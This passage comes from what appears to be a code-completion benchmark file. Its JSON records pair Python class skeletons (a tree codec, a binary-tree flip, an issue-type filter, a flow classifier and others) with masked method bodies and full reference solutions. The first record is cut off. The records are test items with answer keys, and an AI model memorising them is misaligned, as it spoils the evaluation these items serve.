ans\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return None\n root_val = data.pop(0)[1]\n root_node = Node(root_val, [])\n queue = deque([root_node])\n while queue:\n node = queue.popleft()\n for child in data.pop(0)[1]:\n child_node = Node(child, [])\n node.children.append(child_node)\n queue.append(child_node)\n return root_node\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. 
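StemmingHelper, whose record closes above, presumes a module-level global_stemmer and a shared word_lookup dict on the class, and its methods take cls, so they read as classmethods; none of that scaffolding appears in the skeleton. One way to exercise the logic, with NLTK's PorterStemmer standing in for global_stemmer (an assumption; the record never names the stemmer):

    from nltk.stem.porter import PorterStemmer

    global_stemmer = PorterStemmer()
    # Assumes stem/original_form are restored as classmethods and that the
    # class defines word_lookup = {} as shared state:
    StemmingHelper.stem('running')       # -> 'run'  ('running' now seen once)
    StemmingHelper.stem('running')       # -> 'run'  ('running' now seen twice)
    StemmingHelper.stem('runs')          # -> 'run'  ('runs' seen once)
    StemmingHelper.original_form('run')  # -> 'running', the most frequent surface form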
:type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root is None:\n return []\n queue = deque([root])\n ans = []\n ans.append(['#', root.val])\n while queue:\n node = queue.popleft()\n child_list = []\n for child in node.children:\n child_list.append(child.val)\n queue.append(child)\n ans.append([node.val, child_list])\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return None\n root_val = data.pop(0)[1]\n root_node = Node(root_val, [])\n queue = deque([root_node])\n while queue:\n node = queue.popleft()\n for child in data.pop(0)[1]:\n child_node = Node(child, [])\n node.children.append(child_node)\n queue.append(child_node)\n return root_node\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000281", "length_bytes": 1523, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: Node :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: Node", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000366", "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: Node", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: Node\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root is None:\n return []\n queue = deque([root])\n ans = []\n ans.append(['#', root.val])\n while queue:\n node = queue.popleft()\n child_list = []\n for child in node.children:\n child_list.append(child.val)\n queue.append(child)\n ans.append([node.val, child_list])\n return ans\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return None\n root_val = data.pop(0)[1]\n root_node = Node(root_val, [])\n queue = deque([root_node])\n while queue:\n node = queue.popleft()\n for child in data.pop(0)[1]:\n child_node = Node(child, [])\n node.children.append(child_node)\n queue.append(child_node)\n return root_node\n<|end_body_1|>\n", "revision_id": "5e09a5d36ac55d782628a888ad57d48e234b61ac", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. 
:type root: Node :rtype: str\"\"\"\n if root is None:\n return []\n queue = deque([root])\n ans = []\n ans.append(['#', root.val])\n while queue:\n node = queue.popleft()\n child_list = []\n for child in node.children:\n child_list.append(child.val)\n queue.append(child)\n ans.append([node.val, child_list])\n return ans\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n if len(data) == 0:\n return None\n root_val = data.pop(0)[1]\n root_node = Node(root_val, [])\n queue = deque([root_node])\n while queue:\n node = queue.popleft()\n for child in data.pop(0)[1]:\n child_node = Node(child, [])\n node.children.append(child_node)\n queue.append(child_node)\n return root_node\n", "source": "the_stack_v2_python_sparse", "source_path": "428/428.py", "source_repo": "sjzyjc/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "a028872377265846d63fac2fd6d365c5191f4326", "bodies": ["if not root or not root.left:\n return root\nleft, right = (root.left, root.right)\nnew_root = self.upsideDownBinaryTree(left)\nleft.left, left.right = (right, root)\nroot.left, root.right = (None, None)\nreturn new_root", "p, parent, parent_right = (root, None, None)\nwhile p:\n left = p.left\n p.left = parent_right\n parent_right = p.right\n p.right = parent\n parent = p\n p = left\nreturn parent"], "bodies_text": "<|body_start_0|>\n if not root or not root.left:\n return root\n left, right = (root.left, root.right)\n new_root = self.upsideDownBinaryTree(left)\n left.left, left.right = (right, root)\n root.left, root.right = (None, None)\n return new_root\n<|end_body_0|>\n\n<|body_start_1|>\n p, parent, parent_right = (root, None, None)\n while p:\n left = p.left\n p.left = parent_right\n parent_right = p.right\n p.right = parent\n parent = p\n p = left\n return parent\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def upsideDownBinaryTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_0|>\n\n def upsideDownBinaryTree_iterative(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root or not root.left:\n return root\n left, right = (root.left, root.right)\n new_root = self.upsideDownBinaryTree(left)\n left.left, left.right = (right, root)\n root.left, root.right = (None, None)\n return new_root\n<|end_body_0|>\n\n<|body_start_1|>\n p, parent, parent_right = (root, None, None)\n while p:\n left = p.left\n p.left = parent_right\n parent_right = p.right\n p.right = parent\n parent = p\n p = left\n return parent\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000282", "length_bytes": 2305, "license_type": "no_license", "methods": [{"docstring": ":type root: TreeNode :rtype: TreeNode", "name": "upsideDownBinaryTree", "signature": "def upsideDownBinaryTree(self, root)"}, {"docstring": ":type root: TreeNode :rtype: TreeNode", "name": "upsideDownBinaryTree_iterative", "signature": "def upsideDownBinaryTree_iterative(self, root)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def upsideDownBinaryTree(self, root): :type root: TreeNode :rtype: TreeNode\n- def upsideDownBinaryTree_iterative(self, root): :type root: TreeNode :rtype: TreeNode", "prompted_full_text": "Implement 
the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def upsideDownBinaryTree(self, root): :type root: TreeNode :rtype: TreeNode\n- def upsideDownBinaryTree_iterative(self, root): :type root: TreeNode :rtype: TreeNode\n\n<|skeleton|>\nclass Solution:\n\n def upsideDownBinaryTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_0|>\n\n def upsideDownBinaryTree_iterative(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not root or not root.left:\n return root\n left, right = (root.left, root.right)\n new_root = self.upsideDownBinaryTree(left)\n left.left, left.right = (right, root)\n root.left, root.right = (None, None)\n return new_root\n<|end_body_0|>\n\n<|body_start_1|>\n p, parent, parent_right = (root, None, None)\n while p:\n left = p.left\n p.left = parent_right\n parent_right = p.right\n p.right = parent\n parent = p\n p = left\n return parent\n<|end_body_1|>\n", "revision_id": "e60ba45fe2f2e5e3b3abfecec3db76f5ce1fde59", "skeleton": "<|skeleton|>\nclass Solution:\n\n def upsideDownBinaryTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_0|>\n\n def upsideDownBinaryTree_iterative(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def upsideDownBinaryTree(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n if not root or not root.left:\n return root\n left, right = (root.left, root.right)\n new_root = self.upsideDownBinaryTree(left)\n left.left, left.right = (right, root)\n root.left, root.right = (None, None)\n return new_root\n\n def upsideDownBinaryTree_iterative(self, root):\n \"\"\":type root: TreeNode :rtype: TreeNode\"\"\"\n p, parent, parent_right = (root, None, None)\n while p:\n left = p.left\n p.left = parent_right\n parent_right = p.right\n p.right = parent\n parent = p\n p = left\n return parent\n", "source": "the_stack_v2_python_sparse", "source_path": "src/lt_156.py", "source_repo": "oxhead/CodingYourWay", "split": "test", "star_events_count": 0} {"blob_id": "597a3541def82f6f1257622801f39c914c930aa9", "bodies": ["if config_string and (not config_string.startswith('+')) and (not config_string.startswith('-')):\n self._include_by_default = False\nelif config_string:\n config_string = IssueTypeConfig.DEFAULT_FILTER + ',' + config_string\n self._include_by_default = True\nelse:\n config_string = IssueTypeConfig.DEFAULT_FILTER\n self._include_by_default = True\nself.config_string = config_string\nissue_types = config_string.split(',')\nself.klasses = []\nfor issue_type in issue_types:\n if not issue_type:\n continue\n if issue_type.startswith('-'):\n want_this_issue_type = False\n issue_type = issue_type[1:]\n elif issue_type.startswith('+'):\n want_this_issue_type = True\n issue_type = issue_type[1:]\n else:\n want_this_issue_type = True\n try:\n klass = ISSUE_TYPES[issue_type]\n self.klasses.append((klass, want_this_issue_type))\n except KeyError:\n print('Issue type filter: unknown issue type: %s' % issue_type, file=sys.stderr)", "sorted_issue_types = [cls for _, cls in sorted(issue_types.items(), key=itemgetter(0))]\nif not self._include_by_default:\n source_list = []\n for cls, _ in self.klasses:\n for issue_type in sorted_issue_types:\n if (issue_type == cls or 
issubclass(issue_type, cls)) and (not issue_type in source_list):\n source_list.append(issue_type)\nelse:\n source_list = sorted_issue_types\nret = []\nfor klass_a in source_list:\n want_this_class = self._include_by_default\n for klass_b, want_this_issue_type in self.klasses:\n if klass_a == klass_b or issubclass(klass_a, klass_b):\n want_this_class = want_this_issue_type\n if want_this_class:\n ret.append(klass_a)\nreturn ret", "want_this_issue = self._include_by_default\nfor klass, want_this_issue_type in self.klasses:\n if isinstance(issue, klass):\n want_this_issue = want_this_issue_type\nreturn want_this_issue"], "bodies_text": "<|body_start_0|>\n if config_string and (not config_string.startswith('+')) and (not config_string.startswith('-')):\n self._include_by_default = False\n elif config_string:\n config_string = IssueTypeConfig.DEFAULT_FILTER + ',' + config_string\n self._include_by_default = True\n else:\n config_string = IssueTypeConfig.DEFAULT_FILTER\n self._include_by_default = True\n self.config_string = config_string\n issue_types = config_string.split(',')\n self.klasses = []\n for issue_type in issue_types:\n if not issue_type:\n continue\n if issue_type.startswith('-'):\n want_this_issue_type = False\n issue_type = issue_type[1:]\n elif issue_type.startswith('+'):\n want_this_issue_type = True\n issue_type = issue_type[1:]\n else:\n want_this_issue_type = True\n try:\n klass = ISSUE_TYPES[issue_type]\n self.klasses.append((klass, want_this_issue_type))\n except KeyError:\n print('Issue type filter: unknown issue type: %s' % issue_type, file=sys.stderr)\n<|end_body_0|>\n\n<|body_start_1|>\n sorted_issue_types = [cls for _, cls in sorted(issue_types.items(), key=itemgetter(0))]\n if not self._include_by_default:\n source_list = []\n for cls, _ in self.klasses:\n for issue_type in sorted_issue_types:\n if (issue_type == cls or issubclass(issue_type, cls)) and (not issue_type in source_list):\n source_list.append(issue_type)\n else:\n source_list = sorted_issue_types\n ret = []\n for klass_a in source_list:\n want_this_class = self._include_by_default\n for klass_b, want_this_issue_type in self.klasses:\n if klass_a == klass_b or issubclass(klass_a, klass_b):\n want_this_class = want_this_issue_type\n if want_this_class:\n ret.append(klass_a)\n return ret\n<|end_body_1|>\n\n<|body_start_2|>\n want_this_issue = self._include_by_default\n for klass, want_this_issue_type in self.klasses:\n if isinstance(issue, klass):\n want_this_issue = want_this_issue_type\n return want_this_issue\n<|end_body_2|>\n", "class_docstring": "Issue type filter configuration", "class_name": "IssueTypeConfig", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass IssueTypeConfig:\n \"\"\"Issue type filter configuration\"\"\"\n\n def __init__(self, config_string=None):\n \"\"\"Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.\"\"\"\n <|body_0|>\n\n def filter_issue_types(self, issue_types):\n \"\"\"Filters the given dictionary of issue types. 
This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.\"\"\"\n <|body_1|>\n\n def include_issue_p(self, issue):\n \"\"\"Return whether this issue is wanted or not according to the issue type filter configuration.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if config_string and (not config_string.startswith('+')) and (not config_string.startswith('-')):\n self._include_by_default = False\n elif config_string:\n config_string = IssueTypeConfig.DEFAULT_FILTER + ',' + config_string\n self._include_by_default = True\n else:\n config_string = IssueTypeConfig.DEFAULT_FILTER\n self._include_by_default = True\n self.config_string = config_string\n issue_types = config_string.split(',')\n self.klasses = []\n for issue_type in issue_types:\n if not issue_type:\n continue\n if issue_type.startswith('-'):\n want_this_issue_type = False\n issue_type = issue_type[1:]\n elif issue_type.startswith('+'):\n want_this_issue_type = True\n issue_type = issue_type[1:]\n else:\n want_this_issue_type = True\n try:\n klass = ISSUE_TYPES[issue_type]\n self.klasses.append((klass, want_this_issue_type))\n except KeyError:\n print('Issue type filter: unknown issue type: %s' % issue_type, file=sys.stderr)\n<|end_body_0|>\n\n<|body_start_1|>\n sorted_issue_types = [cls for _, cls in sorted(issue_types.items(), key=itemgetter(0))]\n if not self._include_by_default:\n source_list = []\n for cls, _ in self.klasses:\n for issue_type in sorted_issue_types:\n if (issue_type == cls or issubclass(issue_type, cls)) and (not issue_type in source_list):\n source_list.append(issue_type)\n else:\n source_list = sorted_issue_types\n ret = []\n for klass_a in source_list:\n want_this_class = self._include_by_default\n for klass_b, want_this_issue_type in self.klasses:\n if klass_a == klass_b or issubclass(klass_a, klass_b):\n want_this_class = want_this_issue_type\n if want_this_class:\n ret.append(klass_a)\n return ret\n<|end_body_1|>\n\n<|body_start_2|>\n want_this_issue = self._include_by_default\n for klass, want_this_issue_type in self.klasses:\n if isinstance(issue, klass):\n want_this_issue = want_this_issue_type\n return want_this_issue\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000283", "length_bytes": 5182, "license_type": "permissive", "methods": [{"docstring": "Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.", "name": "__init__", "signature": "def __init__(self, config_string=None)"}, {"docstring": "Filters the given dictionary of issue types. This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. 
For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.", "name": "filter_issue_types", "signature": "def filter_issue_types(self, issue_types)"}, {"docstring": "Return whether this issue is wanted or not according to the issue type filter configuration.", "name": "include_issue_p", "signature": "def include_issue_p(self, issue)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000627", "prompt": "Implement the Python class `IssueTypeConfig` described below.\n\nClass description:\nIssue type filter configuration\n\nMethod signatures and docstrings:\n- def __init__(self, config_string=None): Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.\n- def filter_issue_types(self, issue_types): Filters the given dictionary of issue types. This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.\n- def include_issue_p(self, issue): Return whether this issue is wanted or not according to the issue type filter configuration.", "prompted_full_text": "Implement the Python class `IssueTypeConfig` described below.\n\nClass description:\nIssue type filter configuration\n\nMethod signatures and docstrings:\n- def __init__(self, config_string=None): Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.\n- def filter_issue_types(self, issue_types): Filters the given dictionary of issue types. This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. 
the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.\n- def include_issue_p(self, issue): Return whether this issue is wanted or not according to the issue type filter configuration.\n\n<|skeleton|>\nclass IssueTypeConfig:\n \"\"\"Issue type filter configuration\"\"\"\n\n def __init__(self, config_string=None):\n \"\"\"Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.\"\"\"\n <|body_0|>\n\n def filter_issue_types(self, issue_types):\n \"\"\"Filters the given dictionary of issue types. This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.\"\"\"\n <|body_1|>\n\n def include_issue_p(self, issue):\n \"\"\"Return whether this issue is wanted or not according to the issue type filter configuration.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if config_string and (not config_string.startswith('+')) and (not config_string.startswith('-')):\n self._include_by_default = False\n elif config_string:\n config_string = IssueTypeConfig.DEFAULT_FILTER + ',' + config_string\n self._include_by_default = True\n else:\n config_string = IssueTypeConfig.DEFAULT_FILTER\n self._include_by_default = True\n self.config_string = config_string\n issue_types = config_string.split(',')\n self.klasses = []\n for issue_type in issue_types:\n if not issue_type:\n continue\n if issue_type.startswith('-'):\n want_this_issue_type = False\n issue_type = issue_type[1:]\n elif issue_type.startswith('+'):\n want_this_issue_type = True\n issue_type = issue_type[1:]\n else:\n want_this_issue_type = True\n try:\n klass = ISSUE_TYPES[issue_type]\n self.klasses.append((klass, want_this_issue_type))\n except KeyError:\n print('Issue type filter: unknown issue type: %s' % issue_type, file=sys.stderr)\n<|end_body_0|>\n\n<|body_start_1|>\n sorted_issue_types = [cls for _, cls in sorted(issue_types.items(), key=itemgetter(0))]\n if not self._include_by_default:\n source_list = []\n for cls, _ in self.klasses:\n for issue_type in sorted_issue_types:\n if (issue_type == cls or issubclass(issue_type, cls)) and (not issue_type in source_list):\n source_list.append(issue_type)\n else:\n source_list = sorted_issue_types\n ret = []\n for klass_a in source_list:\n want_this_class = self._include_by_default\n for klass_b, want_this_issue_type in self.klasses:\n if klass_a == klass_b or issubclass(klass_a, klass_b):\n want_this_class = want_this_issue_type\n if want_this_class:\n ret.append(klass_a)\n return ret\n<|end_body_1|>\n\n<|body_start_2|>\n want_this_issue = self._include_by_default\n for 
klass, want_this_issue_type in self.klasses:\n if isinstance(issue, klass):\n want_this_issue = want_this_issue_type\n return want_this_issue\n<|end_body_2|>\n", "revision_id": "c21567d7ecb56da5ee24d56a0dee7776818512dc", "skeleton": "<|skeleton|>\nclass IssueTypeConfig:\n \"\"\"Issue type filter configuration\"\"\"\n\n def __init__(self, config_string=None):\n \"\"\"Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.\"\"\"\n <|body_0|>\n\n def filter_issue_types(self, issue_types):\n \"\"\"Filters the given dictionary of issue types. This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.\"\"\"\n <|body_1|>\n\n def include_issue_p(self, issue):\n \"\"\"Return whether this issue is wanted or not according to the issue type filter configuration.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class IssueTypeConfig:\n \"\"\"Issue type filter configuration\"\"\"\n\n def __init__(self, config_string=None):\n \"\"\"Parse the --issue-types command line argument to get the issue type filter configuration. Args: config_str (str): The filter configuration string. This is a comma-separated list of issue types to report. Alternatively the configuration string may be used to add or remove issues from the default filter. In this case issue types prefixed with '-' are removed by the filter. Issue types prefixed with '+' are included by the filter.\"\"\"\n if config_string and (not config_string.startswith('+')) and (not config_string.startswith('-')):\n self._include_by_default = False\n elif config_string:\n config_string = IssueTypeConfig.DEFAULT_FILTER + ',' + config_string\n self._include_by_default = True\n else:\n config_string = IssueTypeConfig.DEFAULT_FILTER\n self._include_by_default = True\n self.config_string = config_string\n issue_types = config_string.split(',')\n self.klasses = []\n for issue_type in issue_types:\n if not issue_type:\n continue\n if issue_type.startswith('-'):\n want_this_issue_type = False\n issue_type = issue_type[1:]\n elif issue_type.startswith('+'):\n want_this_issue_type = True\n issue_type = issue_type[1:]\n else:\n want_this_issue_type = True\n try:\n klass = ISSUE_TYPES[issue_type]\n self.klasses.append((klass, want_this_issue_type))\n except KeyError:\n print('Issue type filter: unknown issue type: %s' % issue_type, file=sys.stderr)\n\n def filter_issue_types(self, issue_types):\n \"\"\"Filters the given dictionary of issue types. 
This function is careful to preserve the order of issue types given on the command line if the user passed an explicit list. For example, if the user passed: --issue-types=PreprocessorIssue,ConfigGuessIssue on the command line, this function will return: [PreprocessorIssue, ConfigGuessIssue]. This is to allow the user direct control over the order of the column headings for the CSV output format. If no explicit list was passed (i.e. the user specified only non-default inclusions or exclusions prefixed by + or -) the function returns a list of issue type classes sorted in order of their display name.\"\"\"\n sorted_issue_types = [cls for _, cls in sorted(issue_types.items(), key=itemgetter(0))]\n if not self._include_by_default:\n source_list = []\n for cls, _ in self.klasses:\n for issue_type in sorted_issue_types:\n if (issue_type == cls or issubclass(issue_type, cls)) and (not issue_type in source_list):\n source_list.append(issue_type)\n else:\n source_list = sorted_issue_types\n ret = []\n for klass_a in source_list:\n want_this_class = self._include_by_default\n for klass_b, want_this_issue_type in self.klasses:\n if klass_a == klass_b or issubclass(klass_a, klass_b):\n want_this_class = want_this_issue_type\n if want_this_class:\n ret.append(klass_a)\n return ret\n\n def include_issue_p(self, issue):\n \"\"\"Return whether this issue is wanted or not according to the issue type filter configuration.\"\"\"\n want_this_issue = self._include_by_default\n for klass, want_this_issue_type in self.klasses:\n if isinstance(issue, klass):\n want_this_issue = want_this_issue_type\n return want_this_issue\n", "source": "the_stack_v2_python_sparse", "source_path": "src/advisor/issue_type_config.py", "source_repo": "arm-hpc/porting-advisor", "split": "test", "star_events_count": 15} {"blob_id": "5a835443cd21a6f169a9dd6c125659a8acc8016b", "bodies": ["if self.source_port is not None:\n return self.source_port.is_local\nreturn True", "if self.dest_port is not None:\n return self.dest_port.is_local\nreturn True", "super(FlowClassifier, self).validate()\nif self.source_port is None and self.dest_port is None:\n raise errors.ValidationError('One of source_port or dest_port must be set')\nelif self.source_port is not None and self.dest_port is not None:\n raise errors.ValidationError('source_port and dest_port cannot be both set')"], "bodies_text": "<|body_start_0|>\n if self.source_port is not None:\n return self.source_port.is_local\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if self.dest_port is not None:\n return self.dest_port.is_local\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n super(FlowClassifier, self).validate()\n if self.source_port is None and self.dest_port is None:\n raise errors.ValidationError('One of source_port or dest_port must be set')\n elif self.source_port is not None and self.dest_port is not None:\n raise errors.ValidationError('source_port and dest_port cannot be both set')\n<|end_body_2|>\n", "class_docstring": "", "class_name": "FlowClassifier", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FlowClassifier:\n\n def is_classification_local(self):\n \"\"\"Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. 
reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.\"\"\"\n <|body_0|>\n\n def is_dispatch_local(self):\n \"\"\"Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. The has to be done on the destination host because the mark gets lost in transit.\"\"\"\n <|body_1|>\n\n def validate(self):\n \"\"\"Make sure exactly one of {source_port, dest_port} is set\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.source_port is not None:\n return self.source_port.is_local\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n if self.dest_port is not None:\n return self.dest_port.is_local\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n super(FlowClassifier, self).validate()\n if self.source_port is None and self.dest_port is None:\n raise errors.ValidationError('One of source_port or dest_port must be set')\n elif self.source_port is not None and self.dest_port is not None:\n raise errors.ValidationError('source_port and dest_port cannot be both set')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000284", "length_bytes": 5427, "license_type": "permissive", "methods": [{"docstring": "Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. For classification on dest lport, we match using reg7. reg7 is set on all hosts during the time packet passes through L2 app. We can classify the packet right away on any of the hosts and forward it to the first SF, saving 2 hops of going to dest node then to the first SF.", "name": "is_classification_local", "signature": "def is_classification_local(self)"}, {"docstring": "Should the flow classifier dispatch flows be installed locally. For classification on source lport, we match using reg6, so we can dispatch the packet anywhere, and it will be forwarded. No loop will be created because no app will set reg6 again. For classification on dest lport, we match using reg7, so we have to forward the packet all the way to the destination host, and mark it as 'already done SFC', so it won't get stuck in a loop. The has to be done on the destination host because the mark gets lost in transit.", "name": "is_dispatch_local", "signature": "def is_dispatch_local(self)"}, {"docstring": "Make sure exactly one of {source_port, dest_port} is set", "name": "validate", "signature": "def validate(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002254", "prompt": "Implement the Python class `FlowClassifier` described below.\n\nClass description:\nImplement the FlowClassifier class.\n\nMethod signatures and docstrings:\n- def is_classification_local(self): Should the flow classifier classification flows be installed locally For classification on source lport, we match using reg6, which is available only after classification app sets it, so there is no use installing it on other hosts. 
